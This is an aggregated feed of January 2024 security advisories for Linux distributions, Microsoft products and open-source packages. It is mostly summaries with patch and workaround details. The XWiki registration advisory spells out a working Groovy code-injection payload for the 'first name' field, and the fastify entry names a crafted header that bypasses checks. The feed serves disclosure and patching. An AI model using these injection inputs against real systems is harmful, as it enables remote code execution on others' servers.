05.01.2024 02:00:00gentoo[GLSA-202401-02] c-ares: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been found in c-ares, the worst of which could result in the loss of confidentiality or integrity.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-02
05.01.2024 02:00:00gentoo[GLSA-202401-03] BlueZ: Privilege Escalation (high)Multiple vulnerabilities have been discovered in BlueZ, the worst of which can lead to privilege escalation.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-03
05.01.2024 02:00:00gentoo[GLSA-202401-04] WebKitGTK+: Multiple Vulnerabilities (high)Several vulnerabilities have been found in WebKitGTK+, the worst of which can lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-04
05.01.2024 02:00:00gentoo[GLSA-202401-05] RDoc: Command Injection (normal)A vulnerability has been found in RDoc which allows for command injection.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-05
05.01.2024 02:00:00gentoo[GLSA-202401-06] CUPS filters: Remote Code Execution (high)A vulnerability has been found in CUPS filters where remote code execution is possible via the beh filter.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-06
05.01.2024 17:22:32rubysec[RUBYSEC:VIEW_COMPONENT-2024-21636] view_component Cross-site Scripting vulnerability (medium)

### Impact

_What kind of vulnerability is it? Who is impacted?_

This is an XSS vulnerability that has the potential to impact anyone rendering a component directly from a controller with the view_component gem. Note that only components that define a [`#call` method](https://viewcomponent.org/guide/templates.html#call) (i.e. instead of using a sidecar template) are affected. The return value of the `#call` method is not sanitized and can include user-defined content.

In addition, the return value of the [`#output_postamble` method](https://viewcomponent.org/api.html#output_postamble--string) is not sanitized, which can also lead to XSS issues.

### Patches

_Has the problem been patched? What versions should users upgrade to?_

Version 3.9.0 has been released and fully mitigates both the `#call` and the `#output_postamble` vulnerabilities.

### Workarounds

_Is there a way for users to fix or remediate the vulnerability without upgrading?_

Sanitize the return value of `#call`, e.g.:

```ruby
class MyComponent < ApplicationComponent
  def call
    # Escape user-controlled content before it is rendered as HTML.
    html_escape("<div>#{user_input}</div>")
  end
end
```

### References

_Are there any links users can visit to find out more?_

https://github.com/ViewComponent/view_component/pull/1950

### For more information

If you have any questions or comments about this advisory: Open an issue in the [github/view_component](https://github.com/github/view_component) project.

https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:VIEW_COMPONENT-2024-21636
06.01.2024 02:00:00gentoo[GLSA-202401-07] R: Directory Traversal (normal)A vulnerability was found in R which could allow for remote code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-07
08.01.2024 02:00:00cisa[CISA-2024:0108] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (critical)CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0108
08.01.2024 15:54:39almalinux[ALSA-2024:0071] squid security update (important)squid security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0071
07.01.2024 02:00:00gentoo[GLSA-202401-09] Eclipse Mosquitto: Multiple Vulnerabilities (low)Multiple vulnerabilities have been found in Eclipse Mosquitto which could result in denial of service.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-09
07.01.2024 02:00:00gentoo[GLSA-202401-12] Synapse: Multiple Vulnerabilities (low)Multiple vulnerabilities have been found in Synapse, the worst of which could result in information leaks.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-12
07.01.2024 02:00:00gentoo[GLSA-202401-08] util-linux: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in util-linux which can lead to denial of service or information disclosure.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-08
07.01.2024 02:00:00gentoo[GLSA-202401-10] Mozilla Firefox: Multiple Vulnerabilities (high)Multiple vulnerabilities have been found in Mozilla Firefox, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-10
07.01.2024 02:00:00gentoo[GLSA-202401-11] Apache Batik: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been found in Apache Batik, the worst of which could result in arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-11
06.01.2024 20:20:30composer[PHP:AWS-AWS-SDK-PHP-2023-51651] Potential URI resolution path traversal in the AWS SDK for PHPhttps://secdb.nttzen.cloud/security-advisory/composer/PHP:AWS-AWS-SDK-PHP-2023-51651
08.01.2024 16:59:53almalinux[ALSA-2024:0046] squid:4 security update (important)squid:4 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0046
09.01.2024 23:52:48npm[NPM:GHSA-4JH3-6JHV-2MGP] react-native-mmkv Insertion of Sensitive Information into Log File vulnerability (moderate)

## Summary

Before version [v2.11.0](https://github.com/mrousavy/react-native-mmkv/releases/tag/v2.11.0), react-native-mmkv logged the optional encryption key for the MMKV database into the Android system log. The key can be obtained by anyone with access to the Android Debugging Bridge (ADB) if it is enabled in the phone settings. This bug is not present on iOS devices.

## Details

The bridge for communicating between JS code and native code on Android logs the encryption key. This was fixed in commit [a8995cc](https://github.com/mrousavy/react-native-mmkv/commit/a8995ccb7184281f7d168bad3e9987c9bd05f00d) by only logging whether encryption is used.

## Impact

The encryption of an MMKV database protects data from higher privilege processes on the phone that can access the app storage. Additionally, if data in the app's storage is encrypted, it is also encrypted in potential backups.

By logging the encryption secret to the system logs, attackers can trivially recover the secret by enabling ADB, undermining an app's threat model.

The bug was discovered and fixed by somebody else. Not me. I'm just reporting this so users of react-native-mmkv upgrade the dependency.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4JH3-6JHV-2MGP
09.01.2024 20:41:28 ubuntu [USN-6548-4] Linux kernel (GKE) vulnerabilities (high) Several security issues were fixed in the Linux kernel. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6548-4
09.01.2024 20:30:25 ubuntu [USN-6573-1] Linux kernel (Azure) vulnerabilities (high) Several security issues were fixed in the Linux kernel. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6573-1
09.01.2024 20:04:06 ubuntu [USN-6572-1] Linux kernel (Azure) vulnerabilities (high) Several security issues were fixed in the Linux kernel. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6572-1
09.01.2024 19:15:12 alpinelinux [ALPINE:CVE-2023-6129] openssl vulnerability [From CVE-2023-6129] Issue summary: The POLY1305 MAC (message authentication code) implementation contains a bug that might corrupt the internal state of applications running on PowerPC CPU based platforms if the CPU provides vector instructions. Impact summary: If an attacker can influence whether the POLY1305 MAC algorithm is used, the application state might be corrupted with various application dependent consequences. The POLY1305 MAC (message authentication code) implementation in OpenSSL for PowerPC CPUs restores the contents of vector registers in a different order than they are saved. Thus the contents of some of these vector registers are corrupted when returning to the caller. The vulnerable code is used only on newer PowerPC processors supporting the PowerISA 2.07 instructions. The consequences of this kind of internal application state corruption can be various - from no consequences, if the calling application does not depend on the contents of non-volatile XMM registers at all, to the worst consequences, where the attacker could get complete control of the application process. However unless the compiler uses the vector registers for storing pointers, the most likely consequence, if any, would be an incorrect result of some application dependent calculations or a crash leading to a denial of service. The POLY1305 MAC algorithm is most frequently used as part of the CHACHA20-POLY1305 AEAD (authenticated encryption with associated data) algorithm. The most common usage of this AEAD cipher is with TLS protocol versions 1.2 and 1.3. If this cipher is enabled on the server a malicious client can influence whether this AEAD cipher is used. This implies that TLS server applications using OpenSSL can be potentially impacted. However we are currently not aware of any concrete application that would be affected by this issue, therefore we consider this a Low severity security issue. https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6129
09.01.2024 16:51:55 ubuntu [USN-6571-1] Monit vulnerability (high) Monit could be made to bypass authentication checks for disabled accounts. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6571-1
09.01.2024 15:08:13 ubuntu [USN-6038-2] Go vulnerabilities (critical) Several security issues were fixed in Go. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6038-2
09.01.2024 12:29:04 ubuntu [USN-6570-1] PostgreSQL vulnerabilities (high) Several security issues were fixed in PostgreSQL. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6570-1
09.01.2024 21:26:04 maven [MAVEN:GHSA-5GWH-R76W-934H] Qualys Jenkins Plugin for WAS XML External Entity vulnerability (moderate) Qualys Jenkins Plugin for WAS prior to and including version 2.0.11 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure a potentially rogue endpoint via which it was possible to control the response for certain requests, which could be injected with XXE payloads, leading to XXE while processing the response data. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5GWH-R76W-934H
09.01.2024 20:50:05 maven [MAVEN:GHSA-8525-52VG-JV6V] Qualys Jenkins Plugin for Policy Compliance XML External Entity vulnerability (moderate) Qualys Jenkins Plugin for Policy Compliance prior to and including version 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure a potentially rogue endpoint via which it was possible to control the response for certain requests, which could be injected with XXE payloads, leading to XXE while processing the response data. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8525-52VG-JV6V
09.01.2024 10:00:00 msrc [MS:CVE-2024-20666] BitLocker Security Feature Bypass Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20666
09.01.2024 10:00:00 msrc [MS:CVE-2024-20674] Windows Kerberos Security Feature Bypass Vulnerability (critical) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20674
09.01.2024 10:00:00 msrc [MS:CVE-2024-20677] Microsoft Office Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20677
09.01.2024 10:00:00 msrc [MS:CVE-2024-20676] Azure Storage Mover Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20676
09.01.2024 10:00:00 msrc [MS:CVE-2024-20654] Microsoft ODBC Driver Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20654
09.01.2024 10:00:00 msrc [MS:CVE-2024-20657] Windows Group Policy Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20657
09.01.2024 10:00:00 msrc [MS:CVE-2024-20658] Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20658
09.01.2024 10:00:00 msrc [MS:CVE-2024-20680] Windows Message Queuing Client (MSMQC) Information Disclosure (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20680
09.01.2024 10:00:00 msrc [MS:CVE-2024-20682] Windows Cryptographic Services Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20682
09.01.2024 10:00:00 msrc [MS:CVE-2024-20683] Win32k Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20683
09.01.2024 10:00:00 msrc [MS:CVE-2024-20690] Windows Nearby Sharing Spoofing Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20690
09.01.2024 10:00:00 msrc [MS:CVE-2024-20691] Windows Themes Information Disclosure Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20691
09.01.2024 10:00:00 msrc [MS:CVE-2024-20694] Windows CoreMessaging Information Disclosure Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20694
09.01.2024 10:00:00 msrc [MS:CVE-2024-20696] Windows Libarchive Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20696
09.01.2024 10:00:00 msrc [MS:CVE-2024-20697] Windows Libarchive Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20697
09.01.2024 10:00:00 msrc [MS:CVE-2024-20698] Windows Kernel Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20698
09.01.2024 10:00:00 msrc [MS:CVE-2024-20699] Windows Hyper-V Denial of Service Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20699
09.01.2024 10:00:00 msrc [MS:CVE-2024-20700] Windows Hyper-V Remote Code Execution Vulnerability (critical) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20700
09.01.2024 10:00:00 msrc [MS:CVE-2024-21305] Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21305
09.01.2024 10:00:00 msrc [MS:CVE-2024-21307] Remote Desktop Client Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21307
09.01.2024 10:00:00 msrc [MS:CVE-2024-21313] Windows TCP/IP Information Disclosure Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21313
09.01.2024 10:00:00 msrc [MS:CVE-2024-21325] Microsoft Printer Metadata Troubleshooter Tool Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21325
09.01.2024 10:00:00 msrc [MS:CVE-2024-20672] .NET Core and Visual Studio Denial of Service Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20672
09.01.2024 10:00:00 msrc [MS:CVE-2024-0056] Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0056
09.01.2024 10:00:00 msrc [MS:CVE-2024-0057] .NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0057
09.01.2024 10:00:00 msrc [MS:CVE-2024-20652] Windows HTML Platforms Security Feature Bypass Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20652
09.01.2024 10:00:00 msrc [MS:CVE-2024-20653] Microsoft Common Log File System Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20653
09.01.2024 10:00:00 msrc [MS:CVE-2024-20655] Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20655
09.01.2024 10:00:00 msrc [MS:CVE-2024-20656] Visual Studio Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20656
09.01.2024 10:00:00 msrc [MS:CVE-2024-20660] Microsoft Message Queuing Information Disclosure Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20660
09.01.2024 10:00:00 msrc [MS:CVE-2024-20661] Microsoft Message Queuing Denial of Service Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20661
09.01.2024 10:00:00 msrc [MS:CVE-2024-20662] Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20662
09.01.2024 10:00:00 msrc [MS:CVE-2024-20663] Windows Message Queuing Client (MSMQC) Information Disclosure (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20663
09.01.2024 10:00:00 msrc [MS:CVE-2024-20664] Microsoft Message Queuing Information Disclosure Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20664
09.01.2024 10:00:00 msrc [MS:CVE-2024-21316] Windows Server Key Distribution Service Security Feature Bypass (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21316
09.01.2024 10:00:00 msrc [MS:CVE-2024-20681] Windows Subsystem for Linux Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20681
09.01.2024 10:00:00 msrc [MS:CVE-2024-20686] Win32k Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20686
09.01.2024 10:00:00 msrc [MS:CVE-2024-20687] Microsoft AllJoyn API Denial of Service Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20687
09.01.2024 10:00:00 msrc [MS:CVE-2024-20692] Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20692
09.01.2024 10:00:00 msrc [MS:CVE-2024-21306] Microsoft Bluetooth Driver Spoofing Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21306
09.01.2024 10:00:00 msrc [MS:CVE-2024-21309] Windows Kernel-Mode Driver Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21309
09.01.2024 10:00:00 msrc [MS:CVE-2024-21310] Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21310
09.01.2024 10:00:00 msrc [MS:CVE-2024-21311] Windows Cryptographic Services Information Disclosure Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21311
09.01.2024 10:00:00 msrc [MS:CVE-2024-21312] .NET Framework Denial of Service Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21312
09.01.2024 10:00:00 msrc [MS:CVE-2024-21314] Microsoft Message Queuing Information Disclosure Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21314
09.01.2024 10:00:00 msrc [MS:CVE-2024-21318] Microsoft SharePoint Server Remote Code Execution Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21318
09.01.2024 10:00:00 msrc [MS:CVE-2024-21319] Microsoft Identity Denial of service vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21319
09.01.2024 10:00:00 msrc [MS:CVE-2024-21320] Windows Themes Spoofing Vulnerability (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21320
09.01.2024 10:00:00 msrc [MS:CVE-2022-35737] MITRE: CVE-2022-35737 SQLite allows an array-bounds overflow (important) https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2022-35737
09.01.2024 02:00:00 redhat [RHSA-2024:0089] kpatch-patch security update (important) This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Security Fix(es): * kernel: use after free in unix_stream_sendpage (CVE-2023-4622) * kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0089
08.01.2024 20:05:14 ubuntu [USN-6569-1] libclamunrar vulnerabilities (high) Several security issues were fixed in libclamunrar. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6569-1
08.01.2024 19:58:27 ubuntu [USN-6568-1] ClamAV update ClamAV was updated to remain compatible with signature database downloads. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6568-1
08.01.2024 19:46:08 ubuntu [USN-6567-1] QEMU vulnerabilities (high) Several security issues were fixed in QEMU. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6567-1
09.01.2024 18:12:43 maven [MAVEN:GHSA-8959-RFXH-R4J4] XWiki vulnerable to Denial of Service attack through attachments (high) ### Impact A user able to attach a file to a page can post a malformed TAR file by manipulating file modification times headers, which when parsed by Tika, could cause a denial of service issue via CPU consumption. ### Patches This vulnerability has been patched in XWiki 14.10.18, 15.5.3 and 15.8 RC1. ### Workarounds The workaround is to download [commons-compress 1.24](https://search.maven.org/remotecontent?filepath=org/apache/commons/commons-compress/1.24.0/commons-compress-1.24.0.jar) and replace the one located in XWiki `WEB-INF/lib/` folder. ### References https://jira.xwiki.org/browse/XCOMMONS-2796 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8959-RFXH-R4J4
08.01.2024 20:37:00 maven [MAVEN:GHSA-RJ7P-XJV7-7229] XWiki Remote Code Execution Vulnerability via User Registration (critical) ### Impact XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the "first name" or "last name" fields during user registration. This impacts all installations that have user registration enabled for guests. To reproduce, register with any username and password and the following payload as "first name": `]]{{/html}}{{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack succeeded){{/groovy}}{{/async}}`. In the following page that confirms the success of the registration, the full first name should be displayed, linking to the created user. If the formatting is broken and a log message with content "ERROR attacker - Attack succeeded!" is logged, the attack succeeded. ### Patches This vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1. ### Workarounds In the administration of your wiki, under "Users & Rights" > "Registration" set the "Registration Successful Message" to the following code: ```velocity #set($message = $services.localization.render('core.register.successful', 'xwiki/2.1', ['USERLINK', $userName])) #set($userLink = $xwiki.getUserName("$userSpace$userName")) {{info}}$message.replace('USERLINK', "{{html clean=false}}$userLink{{/html}}"){{/info}} ``` ### References * https://jira.xwiki.org/browse/XWIKI-21173 * https://github.com/xwiki/xwiki-platform/commit/b290bfd573c6f7db6cc15a88dd4111d9fcad0d31 https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RJ7P-XJV7-7229
09.01.2024 18:12:38 maven [MAVEN:GHSA-XH35-W7WG-95V3] XWiki has no right protection on rollback action (high) ### Impact The rollback action is missing a right protection: it means that a user can rollback to a previous version of the page to gain rights they don't have anymore. This vulnerability impacts all versions of XWiki since the rollback action is available. ### Patches The problem has been patched in XWiki 14.10.16, 15.5.3 and 15.8-rc-1 by ensuring that the rights are checked before performing the rollback. ### Workarounds There's no workaround for this vulnerability, except paying attention to delete old versions of documents that could allow users to gain more rights. ### References * JIRA ticket: https://jira.xwiki.org/browse/XWIKI-21257 * Commit: [4de72875ca49602796165412741033bfdbf1e680](https://github.com/xwiki/xwiki-platform/commit/4de72875ca49602796165412741033bfdbf1e680) ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XH35-W7WG-95V3
08.01.2024 18:47:58 npm [NPM:GHSA-V2V2-HPH8-Q5XP] @fastify/reply-from JSON Content-Type parsing confusion (moderate) ### Impact The main repo of fastify uses [fast-content-type-parse](https://github.com/fastify/fast-content-type-parse) to parse the request Content-Type, which will [trim after split](https://github.com/fastify/fast-content-type-parse/blob/2776d054dd48e9ce40b8d5e5ff9b46fee82b95f1/index.js#L59). [fastify-reply-from](https://github.com/fastify/fastify-reply-from/blob/b79a22d6eb9a0b52cfbe8eb2cb22ad65f5a39e64/index.js#L118C14-L118C14) has not used this repo to unify the parsing of Content-Type, and [won't trim](https://github.com/fastify/fastify-reply-from/blob/b79a22d6eb9a0b52cfbe8eb2cb22ad65f5a39e64/index.js#L118C14-L118C14). As a result, a reverse proxy server built with `@fastify/reply-from` could misinterpret the incoming body when passed a header `ContentType: application/json ; charset=utf-8`. This can lead to bypass of security checks. ### Patches `@fastify/reply-from` v9.6.0 includes the fix. ### Workarounds There are no known workarounds. ### References Hackerone Report: https://hackerone.com/reports/2295770. https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-V2V2-HPH8-Q5XP
09.01.2024 21:59:21 rubysec [RUBYSEC:PUMA-2024-21647] Puma HTTP Request/Response Smuggling vulnerability (medium) ### Impact Prior to versions 6.4.2 and 5.6.8, puma exhibited incorrect behavior when parsing chunked transfer encoding bodies in a way that allowed HTTP request smuggling. Fixed versions limit the size of chunk extensions. Without this limit, an attacker could cause unbounded resource (CPU, network bandwidth) consumption. ### Patches The vulnerability has been fixed in 6.4.2 and 5.6.8. ### Workarounds No known workarounds. ### References * [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling) * Open an issue in [Puma](https://github.com/puma/puma) * See our [security policy](https://github.com/puma/puma/security/policy) https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PUMA-2024-21647
08.01.2024 17:49:04 maven [MAVEN:GHSA-HR2C-P8RH-238H] Apache Axis Improper Input Validation vulnerability (moderate) ** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Axis allowed users with access to the admin service to perform possible SSRF. This issue affects Apache Axis through 1.3. As Axis 1 has been EOL, we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. Alternatively you could use a build of Axis with the patch from https://github.com/apache/axis-axis1-java/commit/685c309febc64aa393b2d64a05f90e7eb9f73e06 applied. The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HR2C-P8RH-238H
09.01.2024 23:52:42 npm [NPM:GHSA-FQH6-6H6C-366M] CouchAuth host header injection vulnerability leaks the password reset token (high) A host header injection vulnerability exists in the NPM package @perfood/couch-auth versions <= 0.20.0. By sending a specially crafted host header in the forgot password request, it is possible to send password reset links to users which, once clicked, lead to an attacker-controlled server and thus leak the password reset token. This may allow an attacker to reset other users' passwords and take over their accounts. https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQH6-6H6C-366M
09.01.2024 21:09:00 npm [NPM:GHSA-WJC4-73Q6-GV3M] plotly.js prototype pollution vulnerability (critical) In Plotly plotly.js before 2.25.2, plot API calls have a risk of __proto__ being polluted in expandObjectPaths or nestedProperty. https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WJC4-73Q6-GV3M
09.01.2024 21:03:25 npm [NPM:GHSA-JCHW-25XP-JWWC] Follow Redirects improperly handles URLs in the url.parse() function (moderate) Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches. https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JCHW-25XP-JWWC
08.01.2024 17:56:29 maven [MAVEN:GHSA-3VVH-8C65-32J4] Mingsoft MCMS SQL injection (high) Mingsoft MCMS v5.2.9 was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list.do. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3VVH-8C65-32J4
08.01.2024 17:56:30 npm [NPM:GHSA-RCVR-8WHX-3M5P] Layui cross-site scripting (XSS) vulnerability (moderate) layui up to v2.74 was discovered to contain a cross-site scripting (XSS) vulnerability via the data-content parameter. https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RCVR-8WHX-3M5P
11.01.2024 00:36:53ubuntu[USN-6577-1] Linux kernel (AWS) vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6577-1
10.01.2024 23:55:12ubuntu[USN-6549-5] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6549-5
10.01.2024 20:42:19ubuntu[USN-6548-5] Linux kernel (IoT) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6548-5
10.01.2024 20:19:33ubuntu[USN-6576-1] Linux kernel (OEM) vulnerability (high)The system could be made to crash or run programs as an administrator.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6576-1
10.01.2024 18:15:46alpinelinux[ALPINE:CVE-2023-41056] redis vulnerability (high)[From CVE-2023-41056] Redis is an in-memory database that persists on disk. Redis incorrectly handles resizing of memory buffers which can result in integer overflow that leads to heap overflow and potential remote code execution. This issue has been patched in version 7.0.15 and 7.2.4.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-41056
10.01.2024 18:00:00cisco[CISCO-SA-TMS-PORTAL-XSS-AXNEVG3S] Cisco TelePresence Management Suite Cross-Site Scripting Vulnerabilities (medium)Multiple vulnerabilities in the web-based management interface of Cisco TelePresence Management Suite (TMS) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by inserting malicious data in a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-TMS-PORTAL-XSS-AXNEVG3S
